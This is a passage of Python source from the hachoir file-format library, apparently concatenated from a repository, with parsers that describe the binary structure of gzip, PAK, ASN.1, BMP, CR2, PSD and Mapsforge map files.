from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.parser.common.deflate import Deflate
class GzipParser(Parser):
endian = LITTLE_ENDIAN
PARSER_TAGS = {
"id": "gzip",
"category": "archive",
"file_ext": ("gz",),
"mime": ("application/x-gzip",),
"min_size": 18 * 8,
"magic_regex": (
# (magic, compression=deflate, <flags>, <mtime>, )
('\x1F\x8B\x08.{5}[\0\2\4\6][\x00-\x0D]', 0),
),
"description": "gzip archive",
}
os_name = {
0: "FAT filesystem",
1: "Amiga",
2: "VMS (or OpenVMS)",
3: "Unix",
4: "VM/CMS",
5: "Atari TOS",
6: "HPFS filesystem (OS/2, NT)",
7: "Macintosh",
8: "Z-System",
9: "CP/M",
10: "TOPS-20",
11: "NTFS filesystem (NT)",
12: "QDOS",
13: "Acorn RISCOS",
}
COMPRESSION_NAME = {
8: "deflate",
}
def validate(self):
if self["signature"].value != b'\x1F\x8B':
return "Invalid signature"
if self["compression"].value not in self.COMPRESSION_NAME:
return "Unknown compression method (%u)" % self["compression"].value
if self["reserved[0]"].value != 0:
return "Invalid reserved[0] value"
if self["reserved[1]"].value != 0:
return "Invalid reserved[1] value"
if self["reserved[2]"].value != 0:
return "Invalid reserved[2] value"
return True
def createFields(self):
# Gzip header
yield Bytes(self, "signature", 2, r"GZip file signature (\x1F\x8B)")
yield Enum(UInt8(self, "compression", "Compression method"), self.COMPRESSION_NAME)
# Flags
yield Bit(self, "is_text", "File content is probably ASCII text")
yield Bit(self, "has_crc16", "Header CRC16")
yield Bit(self, "has_extra", "Extra informations (variable size)")
yield Bit(self, "has_filename", "Contains filename?")
yield Bit(self, "has_comment", "Contains comment?")
yield NullBits(self, "reserved[]", 3)
yield TimestampUnix32(self, "mtime", "Modification time")
# Extra flags
yield NullBits(self, "reserved[]", 1)
yield Bit(self, "slowest", "Compressor used maximum compression (slowest)")
yield Bit(self, "fastest", "Compressor used the fastest compression")
yield NullBits(self, "reserved[]", 5)
yield Enum(UInt8(self, "os", "Operating system"), self.os_name)
# Optional fields
if self["has_extra"].value:
yield UInt16(self, "extra_length", "Extra length")
yield RawBytes(self, "extra", self["extra_length"].value, "Extra")
if self["has_filename"].value:
yield CString(self, "filename", "Filename", charset="ISO-8859-1")
if self["has_comment"].value:
yield CString(self, "comment", "Comment")
if self["has_crc16"].value:
yield textHandler(UInt16(self, "hdr_crc16", "CRC16 of the header"),
hexadecimal)
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError()
# Read file
size = (self._size - self.current_size) // 8 - 8 # -8: crc32+size
if 0 < size:
if self["has_filename"].value:
filename = self["filename"].value
else:
for tag, filename in self.stream.tags:
if tag == "filename" and filename.endswith(".gz"):
filename = filename[:-3]
break
else:
filename = None
yield Deflate(SubFile(self, "file", size, filename=filename))
# Footer
yield textHandler(UInt32(self, "crc32",
"Uncompressed data content CRC32"), hexadecimal)
yield filesizeHandler(UInt32(self, "size", "Uncompressed size"))
def createDescription(self):
desc = "gzip archive"
info = []
if "filename" in self:
info.append('filename "%s"' % self["filename"].value)
if "size" in self:
info.append("was %s" % self["size"].display)
if self["mtime"].value:
info.append(self["mtime"].display)
return "%s: %s" % (desc, ", ".join(info))
```
#### File: parser/archive/prs_pak.py
```python
from hachoir.parser import Parser
from hachoir.field import (UInt32, String, SubFile, FieldSet)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.text_handler import filesizeHandler
class FileEntry(FieldSet):
def createFields(self):
yield String(self, "filename", 56, truncate="\0")
yield filesizeHandler(UInt32(self, "size"))
yield SubFile(self, "data", self["size"].value, filename=self["filename"].value)
def createDescription(self):
return self["filename"].value
class PRSPakFile(Parser):
PARSER_TAGS = {
"id": "prs_pak",
"category": "archive",
"file_ext": ("pak",),
"mime": (u"application/octet-stream",),
"min_size": 4 * 8, # just the identifier
"magic": ((b'PACK', 0),),
"description": "Parallel Realities Starfighter .pak archive",
}
endian = LITTLE_ENDIAN
def validate(self):
return (self.stream.readBytes(0, 4) == b'PACK'
and self["file[0]/size"].value >= 0
and len(self["file[0]/filename"].value) > 0)
def createFields(self):
yield String(self, "magic", 4)
# all remaining data must be file entries:
while self.current_size < self._size:
yield FileEntry(self, "file[]")
```
#### File: parser/container/asn1.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
FieldError, ParserError,
Bit, Bits, Bytes, UInt8, GenericInteger, String,
Field, Enum, RawBytes)
from hachoir.core.endian import BIG_ENDIAN
from hachoir.core.tools import createDict, humanDatetime
from hachoir.stream import InputStreamError
from hachoir.core.text_handler import textHandler
# --- Field parser ---
class ASNInteger(Field):
"""
Integer: two cases:
- first byte in 0..127: it's the value
- first byte in 128..255: byte & 127 is the number of bytes,
next bytes are the value
"""
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, 8, description)
stream = self._parent.stream
addr = self.absolute_address
value = stream.readBits(addr, 8, BIG_ENDIAN)
if 128 <= value:
nbits = (value & 127) * 8
if not nbits:
raise ParserError("ASN.1: invalid ASN integer size (zero)")
if 64 < nbits:
# Arbitrary limit to catch errors
raise ParserError("ASN.1: ASN integer is limited to 64 bits")
self._size = 8 + nbits
value = stream.readBits(addr + 8, nbits, BIG_ENDIAN)
self.createValue = lambda: value
class OID_Integer(Bits):
def __init__(self, parent, name, description=None):
Bits.__init__(self, parent, name, 8, description)
stream = self._parent.stream
addr = self.absolute_address
size = 8
value = 0
byte = stream.readBits(addr, 8, BIG_ENDIAN)
value = byte & 127
while 128 <= byte:
addr += 8
size += 8
if 64 < size:
# Arbitrary limit to catch errors
raise ParserError(
"ASN.1: Object identifier is limited 64 bits")
byte = stream.readBits(addr, 8, BIG_ENDIAN)
value = (value << 7) + (byte & 127)
self._size = size
self.createValue = lambda: value
def readSequence(self, content_size):
while self.current_size < self.size:
yield Object(self, "item[]")
def readSet(self, content_size):
yield Object(self, "value", size=content_size * 8)
def readASCIIString(self, content_size):
yield String(self, "value", content_size, charset="ASCII")
def readUTF8String(self, content_size):
yield String(self, "value", content_size, charset="UTF-8")
def readBMPString(self, content_size):
yield String(self, "value", content_size, charset="UTF-16")
def readBitString(self, content_size):
yield UInt8(self, "padding_size", description="Number of unused bits")
if content_size > 1:
yield Bytes(self, "value", content_size - 1)
def readOctetString(self, content_size):
yield Bytes(self, "value", content_size)
def formatObjectID(fieldset):
text = [fieldset["first"].display]
items = [field for field in fieldset if field.name.startswith("item[")]
text.extend(str(field.value) for field in items)
return ".".join(text)
def readObjectID(self, content_size):
yield textHandler(UInt8(self, "first"), formatFirstObjectID)
while self.current_size < self.size:
yield OID_Integer(self, "item[]")
def readBoolean(self, content_size):
if content_size != 1:
raise ParserError(
"Overlong boolean: got %s bytes, expected 1 byte" % content_size)
yield textHandler(UInt8(self, "value"), lambda field: str(bool(field.value)))
def readInteger(self, content_size):
# Always signed?
yield GenericInteger(self, "value", True, content_size * 8)
# --- Format ---
def formatFirstObjectID(field):
value = field.value
return "%u.%u" % (value // 40, value % 40)
def formatValue(fieldset):
return fieldset["value"].display
def formatUTCTime(fieldset):
import datetime
value = fieldset["value"].value
year = int(value[0:2])
if year < 50:
year += 2000
else:
year += 1900
month = int(value[2:4])
day = int(value[4:6])
hour = int(value[6:8])
minute = int(value[8:10])
if value[-1] == "Z":
second = int(value[10:12])
dt = datetime.datetime(year, month, day, hour, minute, second)
else:
# Skip timezone...
dt = datetime.datetime(year, month, day, hour, minute)
return humanDatetime(dt)
# --- Object parser ---
class Object(FieldSet):
TYPE_INFO = {
# TODO: Write parser
0: ("end[]", None, "End (reserved for BER, None)", None),
1: ("boolean[]", readBoolean, "Boolean", None),
2: ("integer[]", readInteger, "Integer", None),
3: ("bit_str[]", readBitString, "Bit string", None),
4: ("octet_str[]", readOctetString, "Octet string", None),
5: ("null[]", None, "NULL (empty, None)", None),
6: ("obj_id[]", readObjectID, "Object identifier", formatObjectID),
7: ("obj_desc[]", None, "Object descriptor", None), # TODO: Write parser
# TODO: Write parser # External?
8: ("external[]", None, "External, instance of", None),
9: ("real[]", readASCIIString, "Real number", None), # TODO: Write parser
10: ("enum[]", readInteger, "Enumerated", None),
11: ("embedded[]", None, "Embedded PDV", None), # TODO: Write parser
12: ("utf8_str[]", readUTF8String, "Printable string", None),
# TODO: Write parser
13: ("rel_obj_id[]", None, "Relative object identifier", None),
14: ("time[]", None, "Time", None), # TODO: Write parser
# 15: invalid??? sequence of???
16: ("seq[]", readSequence, "Sequence", None),
17: ("set[]", readSet, "Set", None),
18: ("num_str[]", readASCIIString, "Numeric string", None),
19: ("print_str[]", readASCIIString, "Printable string", formatValue),
20: ("teletex_str[]", readASCIIString, "Teletex (T61, None) string", None),
21: ("videotex_str[]", readASCIIString, "Videotex string", None),
22: ("ia5_str[]", readASCIIString, "IA5 string", formatValue),
23: ("utc_time[]", readASCIIString, "UTC time", formatUTCTime),
24: ("general_time[]", readASCIIString, "Generalized time", None),
25: ("graphic_str[]", readASCIIString, "Graphic string", None),
26: ("visible_str[]", readASCIIString, "Visible (ISO64, None) string", None),
27: ("general_str[]", readASCIIString, "General string", None),
28: ("universal_str[]", readASCIIString, "Universal string", None),
29: ("unrestricted_str[]", readASCIIString, "Unrestricted string", None),
30: ("bmp_str[]", readBMPString, "BMP string", None),
# 31: multiple octet tag number, TODO: not supported
# Extended tag values:
# 31: Date
# 32: Time of day
# 33: Date-time
# 34: Duration
}
TYPE_DESC = createDict(TYPE_INFO, 2)
CLASS_DESC = {0: "universal", 1: "application", 2: "context", 3: "private"}
FORM_DESC = {False: "primitive", True: "constructed"}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
key = self["type"].value & 31
if self['class'].value == 0:
# universal object
if key in self.TYPE_INFO:
self._name, self._handler, self._description, create_desc = self.TYPE_INFO[
key]
if create_desc:
self.createDescription = lambda: "%s: %s" % (
self.TYPE_INFO[key][2], create_desc(self))
self._description = None
elif key == 31:
raise ParserError(
"ASN.1 Object: tag bigger than 30 are not supported")
else:
self._handler = None
elif self['form'].value:
# constructed: treat as sequence
self._name = 'seq[]'
self._handler = readSequence
self._description = 'constructed object type %i' % key
else:
# primitive, context/private
self._name = 'raw[]'
self._handler = readASCIIString
self._description = '%s object type %i' % (
self['class'].display, key)
field = self["size"]
self._size = field.address + field.size + field.value * 8
def createFields(self):
yield Enum(Bits(self, "class", 2), self.CLASS_DESC)
yield Enum(Bit(self, "form"), self.FORM_DESC)
if self['class'].value == 0:
yield Enum(Bits(self, "type", 5), self.TYPE_DESC)
else:
yield Bits(self, "type", 5)
yield ASNInteger(self, "size", "Size in bytes")
size = self["size"].value
if size:
if self._handler:
yield from self._handler(self, size)
else:
yield RawBytes(self, "raw", size)
class ASN1File(Parser):
PARSER_TAGS = {
"id": "asn1",
"category": "container",
"file_ext": ("der",),
"min_size": 16,
"description": "Abstract Syntax Notation One (ASN.1)"
}
endian = BIG_ENDIAN
def validate(self):
try:
root = self[0]
except (InputStreamError, FieldError):
return "Unable to create root object"
if root.size != self.size:
return "Invalid root object size"
return True
def createFields(self):
yield Object(self, "root")
```
#### File: parser/image/bmp.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt8, UInt16, UInt32, Bits,
String, RawBytes, Enum,
PaddingBytes, NullBytes, createPaddingField)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.text_handler import textHandler, hexadecimal
from hachoir.parser.image.common import RGB, PaletteRGBA
from hachoir.core.tools import alignValue
class Pixel4bit(Bits):
static_size = 4
def __init__(self, parent, name):
Bits.__init__(self, parent, name, 4)
class ImageLine(FieldSet):
def __init__(self, parent, name, width, pixel_class):
FieldSet.__init__(self, parent, name)
self._pixel = pixel_class
self._width = width
self._size = alignValue(self._width * self._pixel.static_size, 32)
def createFields(self):
for x in range(self._width):
yield self._pixel(self, "pixel[]")
size = self.size - self.current_size
if size:
yield createPaddingField(self, size)
class ImagePixels(FieldSet):
def __init__(self, parent, name, width, height, pixel_class, size=None):
FieldSet.__init__(self, parent, name, size=size)
self._width = width
self._height = height
self._pixel = pixel_class
def createFields(self):
for y in range(self._height - 1, -1, -1):
yield ImageLine(self, "line[%u]" % y, self._width, self._pixel)
size = (self.size - self.current_size) // 8
if size:
yield NullBytes(self, "padding", size)
class CIEXYZ(FieldSet):
def createFields(self):
yield UInt32(self, "x")
yield UInt32(self, "y")
yield UInt32(self, "z")
class BmpHeader(FieldSet):
color_space_name = {
1: "Business (Saturation)",
2: "Graphics (Relative)",
4: "Images (Perceptual)",
8: "Absolute colormetric (Absolute)",
}
def getFormatVersion(self):
if "gamma_blue" in self:
return 4
if "important_color" in self:
return 3
return 2
def createFields(self):
# Version 2 (12 bytes)
yield UInt32(self, "header_size", "Header size")
yield UInt32(self, "width", "Width (pixels)")
yield UInt32(self, "height", "Height (pixels)")
yield UInt16(self, "nb_plan", "Number of plan (=1)")
# may be zero for PNG/JPEG picture
yield UInt16(self, "bpp", "Bits per pixel")
# Version 3 (40 bytes)
if self["header_size"].value < 40:
return
yield Enum(UInt32(self, "compression", "Compression method"), BmpFile.COMPRESSION_NAME)
yield UInt32(self, "image_size", "Image size (bytes)")
yield UInt32(self, "horizontal_dpi", "Horizontal DPI")
yield UInt32(self, "vertical_dpi", "Vertical DPI")
yield UInt32(self, "used_colors", "Number of color used")
yield UInt32(self, "important_color", "Number of import colors")
# Version 4 (108 bytes)
if self["header_size"].value < 108:
return
yield textHandler(UInt32(self, "red_mask"), hexadecimal)
yield textHandler(UInt32(self, "green_mask"), hexadecimal)
yield textHandler(UInt32(self, "blue_mask"), hexadecimal)
yield textHandler(UInt32(self, "alpha_mask"), hexadecimal)
yield Enum(UInt32(self, "color_space"), self.color_space_name)
yield CIEXYZ(self, "red_primary")
yield CIEXYZ(self, "green_primary")
yield CIEXYZ(self, "blue_primary")
yield UInt32(self, "gamma_red")
yield UInt32(self, "gamma_green")
yield UInt32(self, "gamma_blue")
def parseImageData(parent, name, size, header):
if ("compression" not in header) or (header["compression"].value in (0, 3)):
width = header["width"].value
height = header["height"].value
bpp = header["bpp"].value
if bpp == 32:
cls = UInt32
elif bpp == 24:
cls = RGB
elif bpp == 8:
cls = UInt8
elif bpp == 4:
cls = Pixel4bit
else:
cls = None
if cls:
return ImagePixels(parent, name, width, height, cls, size=size * 8)
return RawBytes(parent, name, size)
class BmpFile(Parser):
PARSER_TAGS = {
"id": "bmp",
"category": "image",
"file_ext": ("bmp",),
"mime": ("image/x-ms-bmp", "image/x-bmp"),
"min_size": 30 * 8,
# "magic": (("BM", 0),),
"magic_regex": ((
# "BM", <filesize>, <reserved>, header_size=(12|40|108)
b"BM.{4}.{8}[\x0C\x28\x6C]\0{3}",
0),),
"description": "Microsoft bitmap (BMP) picture"
}
endian = LITTLE_ENDIAN
COMPRESSION_NAME = {
0: "Uncompressed",
1: "RLE 8-bit",
2: "RLE 4-bit",
3: "Bitfields",
4: "JPEG",
5: "PNG",
}
def validate(self):
if self.stream.readBytes(0, 2) != b'BM':
return "Wrong file signature"
if self["header/header_size"].value not in (12, 40, 108):
return "Unknown header size (%s)" % self["header_size"].value
if self["header/nb_plan"].value != 1:
return "Invalid number of planes"
return True
def createFields(self):
yield String(self, "signature", 2, "Header (\"BM\")", charset="ASCII")
yield UInt32(self, "file_size", "File size (bytes)")
yield PaddingBytes(self, "reserved", 4, "Reserved")
yield UInt32(self, "data_start", "Data start position")
yield BmpHeader(self, "header")
# Compute number of color
header = self["header"]
bpp = header["bpp"].value
if 0 < bpp <= 8:
if "used_colors" in header and header["used_colors"].value:
nb_color = header["used_colors"].value
else:
nb_color = (1 << bpp)
else:
nb_color = 0
# Color palette (if any)
if nb_color:
yield PaletteRGBA(self, "palette", nb_color)
# Seek to data start
field = self.seekByte(self["data_start"].value)
if field:
yield field
# Image pixels
size = min(self["file_size"].value - self["data_start"].value,
(self.size - self.current_size) // 8)
yield parseImageData(self, "pixels", size, header)
def createDescription(self):
return "Microsoft Bitmap version %s" % self["header"].getFormatVersion()
def createContentSize(self):
return self["file_size"].value * 8
```
#### File: parser/image/cr2.py
```python
from hachoir.parser import Parser
from hachoir.field import SeekableFieldSet, RootSeekableFieldSet, Bytes, String, UInt8, UInt16, UInt32
from hachoir.core.endian import LITTLE_ENDIAN, BIG_ENDIAN
from hachoir.core.text_handler import textHandler, hexadecimal
from hachoir.parser.image.exif import IFD, IFD_TAGS
def getStrips(ifd):
data = {}
for i, entry in enumerate(ifd.array('entry')):
data[entry['tag'].display] = entry
# image data
if "StripOffsets" in data and "StripByteCounts" in data:
offs = ifd.getEntryValues(data["StripOffsets"])
bytes = ifd.getEntryValues(data["StripByteCounts"])
for off, byte in zip(offs, bytes):
yield off.value, byte.value
class ImageFile(SeekableFieldSet):
def __init__(self, parent, name, description, ifd):
SeekableFieldSet.__init__(self, parent, name, description, None)
self._ifd = ifd
def createFields(self):
for off, byte in getStrips(self._ifd):
self.seekByte(off, relative=False)
yield Bytes(self, "strip[]", byte)
class CR2File(RootSeekableFieldSet, Parser):
PARSER_TAGS = {
"id": "cr2",
"category": "image",
"file_ext": ("cr2",),
"mime": ("image/x-canon-cr2",),
"min_size": 15,
"magic": ((b"CR", 8),),
"description": "Canon CR2 raw image data, version 2.0"
}
# Correct endian is set in constructor
endian = LITTLE_ENDIAN
def __init__(self, stream, **args):
RootSeekableFieldSet.__init__(
self, None, "root", stream, None, stream.askSize(self))
if self.stream.readBytes(0, 2) == b"MM":
self.endian = BIG_ENDIAN
Parser.__init__(self, stream, **args)
def validate(self):
endian = self.stream.readBytes(0, 2)
if endian not in (b"MM", b"II"):
return "Invalid endian (%r)" % endian
if self["version"].value != 42:
return "Unknown Canon TIFF version - " + str(self["version"].value)
if self["cr_identifier"].value != "CR":
return "Unknown Canon Raw File"
return True
def createFields(self):
iff_start = self.absolute_address
yield String(self, "endian", 2, "Endian ('II' or 'MM')", charset="ASCII")
if self["endian"].value == "II":
self.endian = LITTLE_ENDIAN
else:
self.endian = BIG_ENDIAN
yield UInt16(self, "version", "TIFF version number")
yield UInt32(self, "img_dir_ofs", "Next image directory offset")
yield String(self, "cr_identifier", 2, "Canon Raw marker", charset="ASCII")
yield UInt8(self, "cr_major_version", "Canon Raw major version number")
yield UInt8(self, "cr_minor_version", "Canon Raw minor version number")
yield textHandler(UInt32(self, "cr_raw_ifd_offset", "Offset to Raw IFD"), hexadecimal)
offsets = [(self['img_dir_ofs'].value, 'ifd[]', IFD)]
while offsets:
offset, name, klass = offsets.pop(0)
self.seekByte(offset + iff_start // 8, relative=False)
ifd = klass(self, name, iff_start)
yield ifd
for entry in ifd.array('entry'):
tag = entry['tag'].value
if tag in IFD_TAGS:
name, klass = IFD_TAGS[tag]
offsets.append((ifd.getEntryValues(entry)[
0].value, name + '[]', klass))
if ifd['next'].value != 0:
offsets.append((ifd['next'].value, 'ifd[]', IFD))
for ifd in self.array('ifd'):
offs = (off for off, byte in getStrips(ifd))
self.seekByte(min(offs), relative=False)
image = ImageFile(self, "image[]", "Image File", ifd)
yield image
```
#### File: parser/image/psd.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt16, UInt32, String, NullBytes, Enum, RawBytes)
from hachoir.core.endian import BIG_ENDIAN
from hachoir.parser.image.photoshop_metadata import Photoshop8BIM
class Config(FieldSet):
def __init__(self, *args):
FieldSet.__init__(self, *args)
self._size = (4 + self["size"].value) * 8
def createFields(self):
yield UInt32(self, "size")
while not self.eof:
yield Photoshop8BIM(self, "item[]")
class PsdFile(Parser):
endian = BIG_ENDIAN
PARSER_TAGS = {
"id": "psd",
"category": "image",
"file_ext": ("psd",),
"mime": ("image/psd", "image/photoshop", "image/x-photoshop"),
"min_size": 4 * 8,
"magic": ((b"8BPS\0\1", 0),),
"description": "Photoshop (PSD) picture",
}
COLOR_MODE = {
0: "Bitmap",
1: "Grayscale",
2: "Indexed",
3: "RGB color",
4: "CMYK color",
7: "Multichannel",
8: "Duotone",
9: "Lab Color",
}
COMPRESSION_NAME = {
0: "Raw data",
1: "RLE",
}
def validate(self):
if self.stream.readBytes(0, 4) != b"8BPS":
return "Invalid signature"
return True
def createFields(self):
yield String(self, "signature", 4, "PSD signature (8BPS)", charset="ASCII")
yield UInt16(self, "version")
yield NullBytes(self, "reserved[]", 6)
yield UInt16(self, "nb_channels")
yield UInt32(self, "width")
yield UInt32(self, "height")
yield UInt16(self, "depth")
yield Enum(UInt16(self, "color_mode"), self.COLOR_MODE)
# Mode data
yield UInt32(self, "mode_data_size")
size = self["mode_data_size"].value
if size:
yield RawBytes(self, "mode_data", size)
# Resources
yield Config(self, "config")
# Reserved
yield UInt32(self, "reserved_data_size")
size = self["reserved_data_size"].value
if size:
yield RawBytes(self, "reserved_data", size)
yield Enum(UInt16(self, "compression"), self.COMPRESSION_NAME)
size = (self.size - self.current_size) // 8
if size:
yield RawBytes(self, "end", size)
```
#### File: parser/misc/mapsforge_map.py
```python
from hachoir.parser import Parser
from hachoir.field import (Bit, Bits, UInt8, UInt16, UInt32, Int32, UInt64, String,
PaddingBits,
Enum, Field, FieldSet, SeekableFieldSet, RootSeekableFieldSet)
from hachoir.core.endian import BIG_ENDIAN
# micro-degrees factor:
UDEG = float(1000 * 1000)
CoordinateEncoding = {
0: "single delta encoding",
1: "double delta encoding",
}
class UIntVbe(Field):
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, description=description)
value = 0
size = 0
while True:
byteValue = self._parent.stream.readBytes(
self.absolute_address + (size * 8), 1)[0]
haveMoreData = (byteValue & 0x80)
value = value | ((byteValue & 0x7f) << (size * 7))
size += 1
assert size < 100, "UIntVBE is too large"
if not(haveMoreData):
break
self._size = size * 8
self.createValue = lambda: value
class IntVbe(Field):
def __init__(self, parent, name, description=None):
Field.__init__(self, parent, name, description=description)
value = 0
size = 0
shift = 0
while True:
byteValue = self._parent.stream.readBytes(
self.absolute_address + (size * 8), 1)[0]
haveMoreData = (byteValue & 0x80)
if size == 0:
isNegative = (byteValue & 0x40)
value = (byteValue & 0x3f)
shift += 6
else:
value = value | ((byteValue & 0x7f) << shift)
shift += 7
size += 1
assert size < 100, "IntVBE is too large"
if not(haveMoreData):
break
if isNegative:
value *= -1
self._size = size * 8
self.createValue = lambda: value
class VbeString(FieldSet):
def createFields(self):
yield UIntVbe(self, "length")
yield String(self, "chars", self["length"].value, charset="UTF-8")
def createDescription(self):
return '(%d B) "%s"' % (self["length"].value, self["chars"].value)
class TagStringList(FieldSet):
def createFields(self):
yield UInt16(self, "num_tags")
for i in range(self["num_tags"].value):
yield VbeString(self, "tag[]")
def createDescription(self):
return "%d tag strings" % self["num_tags"].value
class ZoomIntervalCfg(FieldSet):
def createFields(self):
yield UInt8(self, "base_zoom_level")
yield UInt8(self, "min_zoom_level")
yield UInt8(self, "max_zoom_level")
yield UInt64(self, "subfile_start")
yield UInt64(self, "subfile_size")
def createDescription(self):
return "zoom level around %d (%d - %d)" % (self["base_zoom_level"].value,
self["min_zoom_level"].value, self["max_zoom_level"].value)
class TileIndexEntry(FieldSet):
def createFields(self):
yield Bit(self, "is_water_tile")
yield Bits(self, "offset", 39)
class TileZoomTable(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_pois")
yield UIntVbe(self, "num_ways")
def createDescription(self):
return "%d POIs, %d ways" % (self["num_pois"].value, self["num_ways"].value)
class TileHeader(FieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
numLevels = int(self.zoomIntervalCfg[
"max_zoom_level"].value - self.zoomIntervalCfg["min_zoom_level"].value) + 1
assert(numLevels < 50)
for i in range(numLevels):
yield TileZoomTable(self, "zoom_table_entry[]")
yield UIntVbe(self, "first_way_offset")
class POIData(FieldSet):
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("***POIStart"):
raise ValueError
yield IntVbe(self, "lat_diff")
yield IntVbe(self, "lon_diff")
yield Bits(self, "layer", 4)
yield Bits(self, "num_tags", 4)
for i in range(self["num_tags"].value):
yield UIntVbe(self, "tag_id[]")
yield Bit(self, "have_name")
yield Bit(self, "have_house_number")
yield Bit(self, "have_ele")
yield PaddingBits(self, "pad[]", 5)
if self["have_name"].value:
yield VbeString(self, "name")
if self["have_house_number"].value:
yield VbeString(self, "house_number")
if self["have_ele"].value:
yield IntVbe(self, "ele")
def createDescription(self):
s = "POI"
if self["have_name"].value:
s += ' "%s"' % self["name"]["chars"].value
s += " @ %f/%f" % (self["lat_diff"].value / UDEG,
self["lon_diff"].value / UDEG)
return s
class SubTileBitmap(FieldSet):
static_size = 2 * 8
def createFields(self):
for y in range(4):
for x in range(4):
yield Bit(self, "is_used[%d,%d]" % (x, y))
class WayProperties(FieldSet):
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("---WayStart"):
raise ValueError
yield UIntVbe(self, "way_data_size")
# WayProperties is split into an outer and an inner field, to allow
# specifying data size for inner part:
yield WayPropertiesInner(self, "inner", size=self["way_data_size"].value * 8)
class WayPropertiesInner(FieldSet):
def createFields(self):
yield SubTileBitmap(self, "sub_tile_bitmap")
# yield Bits(self, "sub_tile_bitmap", 16)
yield Bits(self, "layer", 4)
yield Bits(self, "num_tags", 4)
for i in range(self["num_tags"].value):
yield UIntVbe(self, "tag_id[]")
yield Bit(self, "have_name")
yield Bit(self, "have_house_number")
yield Bit(self, "have_ref")
yield Bit(self, "have_label_position")
yield Bit(self, "have_num_way_blocks")
yield Enum(Bit(self, "coord_encoding"), CoordinateEncoding)
yield PaddingBits(self, "pad[]", 2)
if self["have_name"].value:
yield VbeString(self, "name")
if self["have_house_number"].value:
yield VbeString(self, "house_number")
if self["have_ref"].value:
yield VbeString(self, "ref")
if self["have_label_position"].value:
yield IntVbe(self, "label_lat_diff")
yield IntVbe(self, "label_lon_diff")
numWayDataBlocks = 1
if self["have_num_way_blocks"].value:
yield UIntVbe(self, "num_way_blocks")
numWayDataBlocks = self["num_way_blocks"].value
for i in range(numWayDataBlocks):
yield WayData(self, "way_data[]")
def createDescription(self):
s = "way"
if self["have_name"].value:
s += ' "%s"' % self["name"]["chars"].value
return s
class WayData(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_coord_blocks")
for i in range(self["num_coord_blocks"].value):
yield WayCoordBlock(self, "way_coord_block[]")
class WayCoordBlock(FieldSet):
def createFields(self):
yield UIntVbe(self, "num_way_nodes")
yield IntVbe(self, "first_lat_diff")
yield IntVbe(self, "first_lon_diff")
for i in range(self["num_way_nodes"].value - 1):
yield IntVbe(self, "lat_diff[]")
yield IntVbe(self, "lon_diff[]")
class TileData(FieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
FieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 32)
if not self['signature'].value.startswith("###TileStart"):
raise ValueError
yield TileHeader(self, "tile_header", self.zoomIntervalCfg)
numLevels = int(self.zoomIntervalCfg[
"max_zoom_level"].value - self.zoomIntervalCfg["min_zoom_level"].value) + 1
for zoomLevel in range(numLevels):
zoomTableEntry = self["tile_header"][
"zoom_table_entry[%d]" % zoomLevel]
for poiIndex in range(zoomTableEntry["num_pois"].value):
yield POIData(self, "poi_data[%d,%d]" % (zoomLevel, poiIndex))
for zoomLevel in range(numLevels):
zoomTableEntry = self["tile_header"][
"zoom_table_entry[%d]" % zoomLevel]
for wayIndex in range(zoomTableEntry["num_ways"].value):
yield WayProperties(self, "way_props[%d,%d]" % (zoomLevel, wayIndex))
class ZoomSubFile(SeekableFieldSet):
def __init__(self, parent, name, zoomIntervalCfg, **kw):
SeekableFieldSet.__init__(self, parent, name, **kw)
self.zoomIntervalCfg = zoomIntervalCfg
def createFields(self):
if self["/have_debug"].value:
yield String(self, "signature", 16)
if self['signature'].value != "+++IndexStart+++":
raise ValueError
indexEntries = []
numTiles = None
i = 0
while True:
entry = TileIndexEntry(self, "tile_index_entry[]")
indexEntries.append(entry)
yield entry
i += 1
if numTiles is None:
# calculate number of tiles (TODO: better calc this from map
# bounding box)
firstOffset = self["tile_index_entry[0]"]["offset"].value
if self["/have_debug"].value:
firstOffset -= 16
numTiles = firstOffset / 5
if i >= numTiles:
break
for i, indexEntry in enumerate(indexEntries):
offset = indexEntry["offset"].value
self.seekByte(offset, relative=True)
if i != len(indexEntries) - 1:
next_offset = indexEntries[i + 1]["offset"].value
size = (next_offset - offset) * 8
else:
size = self.size - offset * 8
if size == 0:
# hachoir doesn't support empty field.
continue
yield TileData(self, "tile_data[%d]" % i, zoomIntervalCfg=self.zoomIntervalCfg, size=size)
class MapsforgeMapFile(Parser, RootSeekableFieldSet):
PARSER_TAGS = {
"id": "mapsforge_map",
"category": "misc",
"file_ext": ("map",),
"min_size": 62 * 8,
"description": "Mapsforge map file",
}
endian = BIG_ENDIAN
def validate(self):
return self["file_magic"].value == "mapsforge binary OSM" and self["file_version"].value == 3
def createFields(self):
yield String(self, "file_magic", 20)
yield UInt32(self, "header_size")
yield UInt32(self, "file_version")
yield UInt64(self, "file_size")
yield UInt64(self, "creation_date")
yield Int32(self, "min_lat")
yield Int32(self, "min_lon")
yield Int32(self, "max_lat")
yield Int32(self, "max_lon")
yield UInt16(self, "tile_size")
yield VbeString(self, "projection")
# flags
yield Bit(self, "have_debug")
yield Bit(self, "have_map_start")
yield Bit(self, "have_start_zoom")
yield Bit(self, "have_language_preference")
yield Bit(self, "have_comment")
yield Bit(self, "have_created_by")
yield Bits(self, "reserved[]", 2)
if self["have_map_start"].value:
yield UInt32(self, "start_lat")
yield UInt32(self, "start_lon")
if self["have_start_zoom"].value:
yield UInt8(self, "start_zoom")
